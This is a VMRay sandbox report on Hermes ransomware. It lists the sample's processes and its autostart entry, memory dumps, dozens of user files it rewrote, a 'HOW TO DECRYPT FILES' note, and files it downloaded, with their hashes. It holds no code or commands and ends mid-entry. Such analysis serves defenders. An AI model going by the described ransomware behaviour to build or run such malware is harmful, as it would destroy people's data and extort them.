7558b47e...d5b9 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Downloader, Trojan

Remarks

(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xf4c Analysis Target High (Elevated) hermes.exe "C:\Users\FD1HVy\Desktop\Hermes.exe" -
#3 0xc14 Child Process High (Elevated) hermes-decrypter-new.exe "C:\FD1HVy\Hermes-decrypter-new.exe" #1
#4 0xe08 Autostart Medium hermes-decrypter-new.exe "C:\FD1HVy\Hermes-decrypter-new.exe" -

Behavior Information - Grouped by Category

Process #1: hermes.exe
1564 10
»
Information Value
ID #1
File Name c:\users\fd1hvy\desktop\hermes.exe
Command Line "C:\Users\FD1HVy\Desktop\Hermes.exe"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:38, Reason: Analysis Target
Unmonitor End Time: 00:02:22, Reason: Self Terminated
Monitor Duration 00:01:43
OS Process Information
»
Information Value
PID 0xf4c
Parent PID 0x860 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x F30
0x 37C
0x 368
0x D20
0x DB0
0x 8E8
0x 9FC
0x DB4
0x C48
0x DC8
0x F9C
0x EB0
0x F80
0x E90
0x FD4
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
hermes.exe 0x00400000 0x00CCCFFF Relevant Image - 32-bit - False False
buffer 0x001E0000 0x001E0FFF Marked Executable - 32-bit - False False
buffer 0x001F0000 0x001F0FFF Marked Executable - 32-bit 0x001F0015 False False
buffer 0x00DE0000 0x00DE0FFF Marked Executable - 32-bit - False False
buffer 0x00E10000 0x00E10FFF Marked Executable - 32-bit - False False
buffer 0x00E20000 0x00E20FFF Marked Executable - 32-bit - False False
buffer 0x00F40000 0x00F40FFF Marked Executable - 32-bit - False False
buffer 0x028F0000 0x028F0FFF First Execution - 32-bit 0x028F000F False False
buffer 0x02900000 0x02900FFF Marked Executable - 32-bit - False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71F0D4A8, 0x71F8CDE0, ... False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71F0D2C0, 0x71F483B4 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71FECE60 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71F13D60, 0x71F0E7D0 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71FE9374, 0x71F13D60 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71FED000 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71F8D254 False False
system.ni.dll 0x71DD0000 0x727AEFFF Content Changed - 32-bit 0x71F0BBA0 False False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\FD1HVy\Desktop\Hermes.exe 5.38 MB MD5: 834ff8a44652ebeb620bffe8a945de03
SHA1: 97e2f8ae51c63baaf9340776666d9bed272db38f
SHA256: 7558b47e44541d2417d91ce9308ada497f41fb2f550d9bc43231634fe2c1d5b9
SSDeep: 98304:QzHoxAJ5v1XlxuRSptA3mz9CKfHGFUWWsgkSeL2wmidHHoWv/heIY:42Ar1VxuRSptUmz9J3kSeLCAH3/RY
False
C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv 68.95 KB MD5: ad6c1f2a6cdd381ef1a13d3af369d118
SHA1: 33eb70333eedac9888111b1bd449171c56fcc2c4
SHA256: b01e060a3d7781da924fb6e4fd4eab6a5b09345e7be82a8958bc8f770e7a3294
SSDeep: 1536:qj3IKacgmlAQLDH6OeTeKGV6JOsiF5b+27IyxBTqXTH5t63Ye:q0vHQLebT506J385bBLaXTZt6oe
False
C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt 26.84 KB MD5: b78a35a6bd521d114a8a6e2380cd9c6b
SHA1: ec757667040dffd51a1469874a23627bf60c60c4
SHA256: 963368c18a93bd27937a1bc74ff6f071a372cd732651a8ce9ffc50964da37993
SSDeep: 768:I75uZUfiRELgRi3kv14eLTsj7E05fzSZu5:I7kKqyLgRoKSg0sI
False
C:\Users\FD1HVy\Desktop\NwrDTZ.docx 9.89 KB MD5: 0b7811a107f951b464151c5d1a44584c
SHA1: d3a413a3eacb7a8f8ae3aba7511e4b31e8fc6901
SHA256: 18d8a6599ea1fe6d4c4eba5a6f990ad971d780a371d5db13d4e191549307b997
SSDeep: 192:KsoyJ/lZGucLKNCWQ/LGj2dhXnyCDlndl2OVJHuIx79OyL6MoUE49Z:KfmZqLKNnQ/c2DyCxn/56Ix5B6/UjZ
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png 26.38 KB MD5: 57c90fd4575a333df65481cb5fbde5ea
SHA1: 83d4afc2810d7914b222da748d624aa12501472d
SHA256: bd8eea59a031641a32cdcba0997a1098df6d3d1e9a1db8ba46d5cd053ecacaa9
SSDeep: 768:lguEWlTIdsLBts4i336GMS9Zj9PTRBd6bcpOz:oWRbBq4i3kS9l9rYOC
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg 43.30 KB MD5: 2ba3444b16eb9089d30cea6c9a027c5b
SHA1: e8bebf538637c0c603bab60df123c5c230ba2170
SHA256: c61394c3380630708d5444c153777cf6a172c6d96c879ac2074b48c9bfe1ee98
SSDeep: 768:TCfGdOdx4IWvqBLB0vX/6rjiM9pzIFwlpb65R+PmjMh9VCuGuBrxLx0:e8bvqlWXWjb9OFwlpb65RWPzXBt10
False
C:\Users\FD1HVy\Documents\1v32WDK.pptx 21.83 KB MD5: 366ef990393cfd047c49a40abf6796f1
SHA1: d6755cfabbe4d6c235e6fe01e9dfe434ca31b23f
SHA256: 1cf1863f1f108e20967657f0d62408bb8d39af087a3ec80dfef25a864b6c2669
SSDeep: 384:WOHIpAh+ICHTiaLxR2bfVUN5Btwgkj44bVCMBtelMg+UD4/mF9+Gm9a1dLSz0J:WOHIShRiLmbfVUHBWjfPeny+3m9aXT
False
C:\Users\FD1HVy\Documents\4z4 82v.xlsx 85.00 KB MD5: d5e0238a22f7bc784abfce03c9f95cd8
SHA1: 27686f68136c4715bbbfa9e4f9ab0e7a3fca2278
SHA256: 3ecba9d88d232d0585b2add438bc5e51880f8a112bbfb96f9ce5f7fc3da1e412
SSDeep: 1536:GObYmhDd8qOQvjon4omiI5YRE+xuEpVxbxdU+WMw7WiyB9hxbVIHkw7RVN1MB+:ZDhd8QFomkRE8umVx2/9W3B9hXINDMB+
False
C:\Users\FD1HVy\Documents\9dHCFyZ_.odt 87.84 KB MD5: 2ceb8c12ade85aa392ced42ceeab6b06
SHA1: 5f0e03816044369d1ff5e0d50af5c4d3dafb9b31
SHA256: aa2835f26ddccbfcf46a036c0e166d74c4f896adfca7e5ce73e42b082a7e0c77
SSDeep: 1536:IiJ1lJ6BXof7gm+rI0+fhxwyfBON6wueixk/6qDQOr1aJ2ihJEPW0xDjmXoakAIo:aVSMm+EHhxfBO0i+/koJ2e05mYZDc
False
C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx 59.31 KB MD5: 304fbb23542e95c7e1ddf7f96fa92f18
SHA1: a8017643f3db2db54f5333cc9d6f3f73c3335286
SHA256: 81eb3ba9c4d9c2ea6768fc978a8f52c7085439d3b4ef1f5c44397da4cf7a1c61
SSDeep: 1536:q7H0iibmbRO1e93YrDkkTdxMSuPX9gV7+DFkjjrOKIbNIFz:q7UiiKFOE9YD3TXcPG7KFkfrIu
False
C:\Users\FD1HVy\Documents\IDj9.docx 69.11 KB MD5: f9f0de41922094a98aa6eb1069bd71f1
SHA1: 312a14d8c0fe53b8e3a50d21bd9be623e8317b6d
SHA256: 1e7b3980e03e94b51f523a1cfbe993c560db00e7fddbe3eaecc946736d9cb5eb
SSDeep: 1536:9jSYA2iTywJIRZTYYlhjt8gB0tmr0fg43NTwWaGBnK:9jSD2zwSrNR8Vk0fnTdaqK
False
C:\Users\FD1HVy\Documents\oK6_.pptx 72.27 KB MD5: c100d596d86f2114cb136b36e8dfe4b7
SHA1: 0b6d33ddca29af40800a5e6d621646c8fd81dd1e
SHA256: eb969b956f0864474d6ccf5e7c588bdc14e3223d759f43fa2855be7da7bc3ca0
SSDeep: 1536:WBr87ww8P6O++j6nuNVlrIuY/fCqrEjTIEYbtWFu:WVuf8PWnEVllYiZjTInRp
False
C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx 10.56 KB MD5: 7fa4252827c5ce4266e99697db5e9d27
SHA1: 481a0a4ecf152d1a0cf3c587dfdb65ed00797403
SHA256: 04e016d28a310ed0b51b34c9b2130624d67e636205e96d7e12b96e175f220cd2
SSDeep: 192:WRxd11WHI1MFw6Mcxo99wdSnkvvTbWNzpBQBau7k1K2tH+/k7VRzMxjdEc/j:Wfd1II1ItXo9Wdi+qQV7OH+kRzYx//j
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf 54.62 KB MD5: bdd278c06d2e1fbcbad8df10434f0450
SHA1: 4c3e06a2ad03f46af3fe420502327715c46c5ff7
SHA256: f73aa083e539ea8d2e0b31e5f8ed8844bdfa3ce116f5ad759261ae24f7dc40dd
SSDeep: 1536:SEkovkSLYdgbXJ37WBOfcmVS8LRA5Jy2asOPTIp7D:rLvkSEgdqEftjkYTsOEpn
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf 33.14 KB MD5: 7b5f427a11038c7a1ccbbf4436fb6148
SHA1: 146342583d1b834c83f5b569c10661ebfcc925c2
SHA256: 4bb3a93a52aa7bdd457c15450106cdf844f54a4080b2f32e8bd008fa64fec2f2
SSDeep: 768:c7qHOQN0jA2JOQYZM6xgbOj/kvvWHZLLzjY4b/DLpt:t3zGy+0gKkvvWhL
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv 11.45 KB MD5: 10674ff65d0458ae63ac252946501ec0
SHA1: 4971ae16efc2fc4d0056e70ed7acafe5160c6468
SHA256: c51b202f25adde4e7e8acae0728cb2b7a603645861d2e4a4b6c4b43907f663fd
SSDeep: 192:KGF9HF98MTgUzv6pRO5R/jOtNXJkSIidDINv5pJ0se9at1ObabHVmnmPdvk:KGPHFUev6OTOtNXJHIitIDpOiwYHVmV
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv 17.34 KB MD5: b80a04cef20a574c1f0c92b52bf7a621
SHA1: bc616a3697ae5a954b633720238076a6fcd38ed1
SHA256: 77de2ebe414ed7b281c366209404251a72448871bddbddff89505f3c3835f1db
SSDeep: 384:1D1vIoJN4DdGq1LlZYOKS9UARo+UyTyE7vu4Qb+ko73kzPbc/:1D5PsGxEbU0yQQyobc/
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls 30.67 KB MD5: 84637d6d31a2206fbd784535d330764b
SHA1: 847de053198eb5b1fd861567d5499699d8a7ce9b
SHA256: b00a7ce3b99600b6b4f23198d3c7f6faf09b84a9c0c0c9801d9fb38459d19db9
SSDeep: 768:mxY+kU13M5cxdb4itx0EylrYhwnE6txjfIJw:EXkU13M5md0GylUgbOw
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls 57.12 KB MD5: a8a045af2595eded55949b5a276ca2ca
SHA1: 2e4986af90dbeb18b3bc2ea06bc8095833e81b8f
SHA256: 98484109bda2d2726cbbd4409f157718a5a5a5b87dd6710b6a8bee6a4b64ddd7
SSDeep: 1536:FKwZ/D9d4Z374f057rW39+Tnlj5MMZYra7qV:FK2/fWUFulyMer1V
False
C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi 90.09 KB MD5: 300442a9a89a5f8b978098fed807cd5e
SHA1: 2296f3c499647d976c1be2712b816f000958cbad
SHA256: 6d4293cf6ba2cc8a104d855eff28f1d03babe7de6c05f0100529bcf47b5cbe74
SSDeep: 1536:N+Euki973khdes3qfwpVoqy+5psAqCcspvDl14Q8DFB379BMeV274zt:N+E+EaEWql5JNvB2QQFB3hBMKzt
False
C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 16.64 KB MD5: 43b15ad65e87ca0632e61021bb8f68ee
SHA1: 8ab9d5854a5eede6a4f62f04a87d3f58451285ee
SHA256: 2d585eac99897efa1d9a9f764519a9aa2ac2c0c10fb689f78556e7b4b0e3d1b6
SSDeep: 384:SPf3ZHYibDeRZvv0uOX+j2ad44Kx69Fo0eHYPj+YEPmrP/md:SPf1t+5cubR1oCK0D6bP8g
False
C:\Users\FD1HVy\Desktop\du_y8ZA.bmp 96.30 KB MD5: 0f03002dbc4a9bf37d0625fbbe0c85de
SHA1: 10e0bd709431adde0b9fa22b663ae1914b0e4719
SHA256: cac907691955d5339837066f5012ffccfacc74ed3addee6ed4c056cc789c0327
SSDeep: 3072:8fG177ozcQMxSJMXeuVwfA0NNZ6NkpfedV84:b1ozNGOEo5ZHpfo84
False
C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv 33.86 KB MD5: dc72854cfcfba3763062e99665002cca
SHA1: 3f9e667c9b1e8d6544a8c8a9c2cedd14df327a78
SHA256: 0cf21a70e18f6107e43894b3ec74863afc276ee70b22b26951d3ac94784a2bfc
SSDeep: 768:ZkAgYgDI+6xZQJfW9UOc+So6SCB1+R+B8DmqR0QbU:KAgYgDyqfWTcc6jBsDmqR03
False
C:\Users\FD1HVy\Desktop\kXyvY.bmp 1.19 KB MD5: 6f7ae2f77556f78d581979d239755aeb
SHA1: 2e8fb0f37373c03c0be194f1534e404b403b9459
SHA256: 1c6ef441941b96f802886f0ef1870f95401c400aa47a9205077213cecfff457b
SSDeep: 24:nqp9DKCgq7vr4V/XPPTZt4joYc3Gs5lEfOKGAuU8foFtxJjlI:qp9DKCg6+XPrZeBsM2KcRoznZI
False
C:\Users\FD1HVy\Desktop\ljwNeYj.avi 83.36 KB MD5: 0cc3f7044a0974ae8e55a0a556ab024a
SHA1: cdcd40620345b68644361cc7336615706ca05df5
SHA256: 11d541d432ff0138f9dee36173018affcae89605c97ee2d8361c353c35604a24
SSDeep: 1536:QGsmgim2roTF5kZa060i4nOMyiXH2e8D4CHfsCJwT86/VuvhLx:ZsmZmfTAZ16ZLMjQICJ8kht
False
C:\Users\FD1HVy\Desktop\mJmzsgIR.avi 3.98 KB MD5: 9db6eedcbaae78df2f408c22c6b1efac
SHA1: 761f93169388981a21fdb15f9d80926eb85bf0a9
SHA256: 02ba7929c08ecd5b916342021264d75ab843b4cbd93f5a5907ef201c2b1ecac9
SSDeep: 96:jWOmKed29CoDHdYeRMiXBE2D1T9vCxl5Z8G1lM1H4ttZI:iOmHI9CoDHdYMM8jfC71Tq
False
C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi 99.98 KB MD5: 270e3e3895e9225381076e35bf63e3ac
SHA1: 19dd8d92f375167f6aa1450ed0288ba7b10ea204
SHA256: 837b823b656ce295236edfb274fc166d8d9adc8cb3d18d3980787fd51322ca60
SSDeep: 3072:OCqq9c0ms4eW5u3fKQNVJRrZwQe2zSUs6d:pR9c+4Xu3i62p206d
False
C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg 57.09 KB MD5: 2f290342d3f473eeb5e6bc114c6858d5
SHA1: 7871e7f09559351a78990ee2a7502898affd9d33
SHA256: 4b190f44d90a8154c38af4a2f5b54b126264cfd094c2a9acd7eb06b180bbf8d7
SSDeep: 1536:3iXsyx8zbaRS0Ba3pfy2wLVnZtHHTNay1d5UMfzfTh4CZeOYWsjID:axIWRlsMBHpFU47ThoObsjE
False
C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 53.23 KB MD5: 6ce21db449e33d185bb5780d72f4e91b
SHA1: 1de59bcec508b398a33a53535eeccc93c9e3f8ae
SHA256: cf4c6842fa3c0b1b33bd55247bf1c47c4b8e816363d3cf42a665659c39c9774d
SSDeep: 768:gdgawE4GSM2+M4ONyfyJYKBZ9u9wGc/j2K2wKFr0OUiVxibjIFWDk+LfZYjiot5v:Laf4Xx1yYYKBZMkCPwKFAjAikuotsW
False
C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png 60.89 KB MD5: 376641291ef5532bea940b8fbfb5ce45
SHA1: 68ecf05d9cc3e78e839ba85fc4ae39c64fcce1d2
SHA256: 4e01a38c408073353ce8ef7ee521d46630f1b53659c641d7c5ef780df88c09a4
SSDeep: 768:mxfLYbjWF72LQ6z/6v0LQJi2Jq87QUXG1UxLO33yX1crbwSi88kIHFGbF+MkPI/Z:m5ei4/6vOV2E8G+OyXifwL8JozoPaY
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv 88.98 KB MD5: bc9240710eba1af58a5d8fbd1249d6c2
SHA1: 06f46229ecd3cde887d6d0ab9c2d2f526a1c0994
SHA256: 5a4b6f2d01ec8660f7d3672bc1c83d5d998f29738282500b0e2bf8c1d75c5155
SSDeep: 1536:tG8PHfeAQjL6bERPhynZJN7+lUJ1oMuc9jnVToHnZLIQc4QllMKg:j2D7iElIFFVToHFHc4Qal
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls 23.77 KB MD5: aa6c986a3eaffe463a64b0d155a8bf54
SHA1: 8fbb656cd9064b56b9f54cee7aa9fd8c0b7b1df8
SHA256: e9acdc34703a1af5da3e1433a584b734707559a04cb1fcf19805368a1e61bd88
SSDeep: 384:qHYPu1fDzvfu3vCniktGlqYCnV+GRgqSr9foCQy7Z+kjyk6c0Qhe/Hc:iX1PfuKni0RgdJoI7ZDjy6ZhH
False
C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 61.80 KB MD5: 60e0c2d3e9ce3be37d8ca6ad7bd5f982
SHA1: 8b05ff300e33446a9fbda6cf28211ea06e47fbc0
SHA256: 1e1028c91fe8c80941537dcc5b0411a02d1bcc4a008a9bd54814b1217d33c708
SSDeep: 1536:RuQPLIGxDKH6Yz9MTi+bu7cwhh8AK6XVyQ0wte/z:RuQPFQR9MTAgwrK6kbF/z
False
C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx 82.61 KB MD5: 486ced9e938878bca51b1e2dc2ee8d7c
SHA1: 4f75e4862795b5b3bcf22fb357cff5ba8c52e15a
SHA256: 67baf1c785f8caa1927f07ba9a7af7d587754d01a7cb222b7f8536a729e4b899
SSDeep: 1536:Wpv6ciiVuNMJbJIoZHXSafAUZslo5oTZzvW08H7aQMZYuWmZJeg+HdAyEmp:Wpv6MAN4zHXVdMZz0uQDmZYg+H+yp
False
C:\Users\FD1HVy\Documents\6jL9GY5.xlsx 18.45 KB MD5: f5336f7e6541beb4e482029dbc039a52
SHA1: 4c89a858ed9d4b67087594b3f06f1b602a4497d1
SHA256: 06fc27a6a86c813e348ea53ad2b418f5dcdce09ea511929acd1275d3ab375232
SSDeep: 384:RvwbNXKC4j5ADwiOjYATes/x+6qnhZfx69wiFaj71N0gPKj7s8LzaT:JSXK1akZHT5/kVnnxiw5n1/PUdzaT
False
C:\Users\FD1HVy\Documents\Am2R.docx 5.69 KB MD5: ad83c7ddbf84d4dd29177646127e6637
SHA1: f759c00158fa64897ea08f84e58754b25b411a3d
SHA256: 41a51b0170e52d75b97abb476372c951429fb4dd4e3c2e68657881761d986942
SSDeep: 96:/1FvLRO3ggJ3tqsNod7XiILlr6yL97sSkSl6Roa9yBJUOufMzUVxPF/+QFXpWKLK:/1FvLROwg/Rod7XiKPaSxlvKyvlsr/1W
False
C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx 88.20 KB MD5: e9337169b25a54ce1c58b630681cbc3b
SHA1: 3875577a5f749cad374272652d1b3d9842445d35
SHA256: 25c0c77fafa9823cd8fe46e5b9b6ef207523dc3b7ec220a312f920fb3403078c
SSDeep: 1536:S8okpScRRPHIJ3dfuyfxm/4urpuWqpmytxkQyqgZ9ZhOH+IPALDB4k09JTgVwZyO:SsScalZm/VZqRyQSfhgvgBVFgZ
False
C:\Users\FD1HVy\Documents\pFdPoLW.docx 48.47 KB MD5: 30910d740468f2cbf1d312ba1ff7032a
SHA1: 47f751dea73b9314de45339b9048e80481838f3b
SHA256: f9c55b2af5f8f0aee1758e8509e083993ccfd5a6b611709ad68f792c303f1e2d
SSDeep: 768:RHjmDKnUOrgyoXvrdJANLUyDDz/uzE1l6jCfqBeCDn2WLK/7Pnwki/hLgcheDOCJ:dSWnUXv/zyDD7bSCfq9n7ObwkOL9O
False
C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx 85.69 KB MD5: 7a04b76148ba0ca4a7e3b016b8edfce7
SHA1: 6455b3f3c688bd7bb185241ac4c005946f833b9a
SHA256: 1c3a8f6b6cdaa00f882ca69ac674cbfbf88bf550524034154988e01a262db467
SSDeep: 1536:WwAMj8Yqn5hQvkJbB4LbH+B26MhY8r7Uk/4vFl9e/lqToS2I/55bN1oRHo+DE:W0j8YqnLMWYbeBrghqToMRPMJY
False
C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx 3.38 KB MD5: fc717b83436043a47f821d9919ac439d
SHA1: d76e9af83137a789eda026553f0873a5100878dd
SHA256: 4c7228432c013cc3bea3f01e92227d3bda4f7b7e7eb9482eff0f53eb28deeeff
SSDeep: 96:bGpMEY2PMxKBsAtGaI25LvESyOEfzRAmBbukgMCMrlO:bs7PPMxKmJaBLDzELmmB1gilO
False
C:\Users\FD1HVy\Documents\V_Zl34r.xlsx 32.36 KB MD5: e450aabe898c9e7cdcf192d843bdfd01
SHA1: 90d9c472db6ac06e3bfb699caee1df70c44feb7a
SHA256: 19138d0e4afa0d02467dce098a12a76954703316c65da47bd0bc89dfca0fb80e
SSDeep: 768:mpG7X0Nx+jxsLGOOZRVO820AFxz3DgEcn2LPdOS6cqGj:xENxKOLGO0o820Ar3Q2LPHbqGj
False
C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx 52.30 KB MD5: 2db4bc800d041e580307450c01e34261
SHA1: a68e0dc21efdbf73647d6d4c303f3d750344d37c
SHA256: 91a5078d5e767040460382600bddf188e81b85d1e6a32cedf185bd7b3fe2f458
SSDeep: 1536:mzkv4hlTAmUgw5DvIzr4Be2BW/tLBL6aCDN4sXNu5APOwwbr:mzP7lXYDkrWjo/tLJCDtw096r
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc 29.95 KB MD5: 5a987f72bbfe5c3a17d8626871485ae9
SHA1: a40ecbd6dbfc699506c41528d883aee5d285b0ee
SHA256: e392fc5def55e12dbcfeee41ef89fa3d04d89038ff49bee421a232f0834d95e2
SSDeep: 384:6PQ0jRYVmVzP8nx5BtIy9YVaLycdMAvBXvbMuyPbun7okHe1EJmxhN2:svRtjeXBSyiV+DvJDuaLHlWhN2
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv 52.03 KB MD5: f6f6b4471c5e52dabb7620fbbed0c918
SHA1: ab83fb48454ebc097c612ea1440b0be35d5ad943
SHA256: 8aaa925da5de86d326c413181ab5fc042aaef1ac33c16237fa05a67cb75f6bf1
SSDeep: 768:Ws21iTRFdPIsEDnjy41aeidjvEQbTaExJvAn5+fFnl337hwNUDLxaFl5qKq9Zfc:igPIz1aeAvfFxNbfv3KQtR9Zfc
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv 56.70 KB MD5: 19092c0a6199adfc03ebe06b39b8d261
SHA1: d669a8d152df12ee228da0c0ea040e8e867da038
SHA256: a3207751b5980a2d6e42b7d6dad785b5d11cdd119cf8663991422ddb06c37117
SSDeep: 1536:uYGrlliN6z6FJs1NpbHt3XtpUrY67TgTCYt0n:rGrls0W8pbN3XtahUmYtm
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt 94.34 KB MD5: be6b90ef3f6d22765dd209f3b481c09a
SHA1: 72dd2b567cd96df526554db5bda7efa04abf50a8
SHA256: 1c8acc2281743befc7bf32f7edd18460fb2ff6befb0650274c4b35537a97e139
SSDeep: 1536:ki5MqEsbZNdbZdr7XHbKecolmS0RcflizYrJ/uubIyZ7JYWOJF3S6GSAkANDP:7Gq5ZXZdHLKecIzW0l0YV7aWOHS6G8Ah
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt 38.69 KB MD5: b198fe00ce4f73292036900d13334381
SHA1: e8f5b8ddf18fc121f67a2641e6fd3e928da8d5f2
SHA256: 82dabd555f0da734113827ee2f180926ebb389689d317b984c8e0f67608f8b3f
SSDeep: 768:IDMInmaon6Udd5cenEA9TcM3tw4viaiY+HsIqm8u+rAJEawgjdrXQ:IDHnmaE7pce3TcM3piaR+HCmv6awgZU
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt 22.56 KB MD5: 1ac791d2b4d119deef09d170a48e27d4
SHA1: 162eadbbfc74c8022008074b0f2421d28a3cd80e
SHA256: cdde47d23ea0294c729634d667d46bb692a884593cfae3613932efd13a48a555
SSDeep: 384:d4z/5dxa6zr4UtBEr9wJTntpmyhBE5PiEcacOnC9E5rjt+/:d4z/5dxdptBErEnjmyX2jm6SEjA
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx 72.45 KB MD5: b569732fe900f88590e3cef9ca70becd
SHA1: 7210de7df3aa0f35a8fb48f94dcdc7e0863d70b6
SHA256: 305dc4520b397bf53908a29822e6b2e4170c715dc3ca151566d77d73e0a6e82c
SSDeep: 1536:W+iSxOznr5lNxI9XU9M1w2E26Rea6oFbwfL0JEipmfoWvsIrM+KMat7IPLG84:WJ02r5lKXU9FYaJFUfLeEAWkIrMtMaJ3
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls 86.12 KB MD5: ea492cad22e779812b3774fc0650cf9d
SHA1: 4c0f0f99c49fe1788bb4893b707da4df5711e480
SHA256: 6c4660e64ca11bdb91a87baf01af1404a4fbd69dc9b7c834f5e83609dbfd82da
SSDeep: 1536:WOusoGWE8XyAHvebGzeIZMh8o6K2tBioA6Sz9Tn3GHWX+nXYVo7kQ:VloGgJHGb+Dmn+BioA6Sz9Tn3eWunoOR
False
C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx 80.62 KB MD5: 302c75e59b647def6274b26763079b0a
SHA1: 885bf0f4a424de9e88e79a821d6d67227d7bf54c
SHA256: 1b511995adc16faea282cfa6c50651a95dc857cc129281c0cabc9e334204e35d
SSDeep: 1536:5Hza5JRyP04/DxLl+HrHC1wO5qCRyIDWaaC+eNS2a4skXYSJ6WmiztpEyJJwO:uAxL4HDqwO5qCJNNBah3S4tiz7
False
C:\Users\FD1HVy\Desktop\HOW TO DECRYPT FILES.txt 620 bytes MD5: 1e2d18a6f5b7f885e4a9ec114165f481
SHA1: d855e6ba02ea5fae55cd15ee9c25dc3c418fd9c4
SHA256: 8f6815293e3569e6dfe5a5703e64c9d1e121d73fff205fb3a3bb800956f01590
SSDeep: 12:gqin7cS8CVyN6mzkei2FbDBRDrW6VAJNmF8RN0avcOwEXsMcD3Qv:gqUcSPyN5nfDr/kNzRN0a0OQZDK
False
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\FD1HVy\Hermes-decrypter-new.exe 5.35 MB MD5: 3b85f5b34325130e39ef0d3e6c4487da
SHA1: 519fadc8b74bbb130cc033d229ab6f7835f102a6
SHA256: a98b84e4b28eac459445b957298b2ca219236732f2fee71599b1ce0bb619fe1c
SSDeep: 98304:4SzyuEiYKN963Hj5Tv/dZa2PLKBFxiPusJTtVPeShRnsIgwutgKln:fYu9kHj5bdZ/zKxVwTtVrhFwtf
False
C:\FD1HVy\ransom.jpg 100.35 KB MD5: be0c08c7b656758b59a0e8095ac46500
SHA1: 05a32f45639bdfc10b514b38e94c11476d0db706
